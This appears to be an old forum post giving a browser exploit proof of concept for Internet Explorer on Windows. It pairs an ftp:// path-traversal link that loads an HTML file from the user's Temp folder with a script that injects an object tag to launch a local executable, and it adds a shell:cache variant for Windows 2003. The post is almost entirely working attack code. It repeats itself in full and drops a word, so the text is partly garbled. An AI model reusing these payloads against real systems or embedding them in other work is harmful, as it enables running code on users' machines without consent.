NI3
10-23-2003, 04:21 PM
The following proof-of-concept was provided:
[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>
The must click the exploit link, which loads the following file (which must exist in the user's Temp directory):
[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>
The following will read the file %TEMP%\exploit.html on a Windows 2003 system:
<a href="shell:cache\..\..\Local Settings\Temp\exploit.html">Exploit</a>
[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>
The must click the exploit link, which loads the following file (which must exist in the user's Temp directory):
[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>
The following will read the file %TEMP%\exploit.html on a Windows 2003 system:
<a href="shell:cache\..\..\Local Settings\Temp\exploit.html">Exploit</a>